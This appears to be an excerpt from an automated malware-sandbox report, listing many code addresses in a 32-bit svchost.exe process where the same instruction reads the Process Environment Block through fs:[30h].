Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]	2_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]	2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]	2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]	2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]	2_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]	2_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]	2_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]	2_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]	2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]	2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]	2_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]	2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]	2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]	2_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]	2_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]	2_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]	2_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]	2_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]	2_2_036C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]	2_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]	2_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]	2_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]	2_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]	2_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]	2_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]	2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]	2_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]	2_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]	2_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]	2_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]	2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]	2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]	2_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]	2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]	2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]	2_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]	2_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]	2_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]	2_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]	2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]	2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]	2_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]	2_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]	2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]	2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]	2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]	2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]	2_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]	2_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]	2_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]	2_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]	2_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]	2_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]	2_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]	2_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]	2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]	2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0366C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]	2_2_036666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]	2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]	2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]	2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]	2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]	2_2_036C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]	2_2_036325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]	2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]	2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]	2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]	2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]	2_2_036365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]	2_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]	2_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]	2_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]	2_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]	2_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]	2_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]	2_2_0366A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]	2_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]	2_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]	2_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]	2_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]	2_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
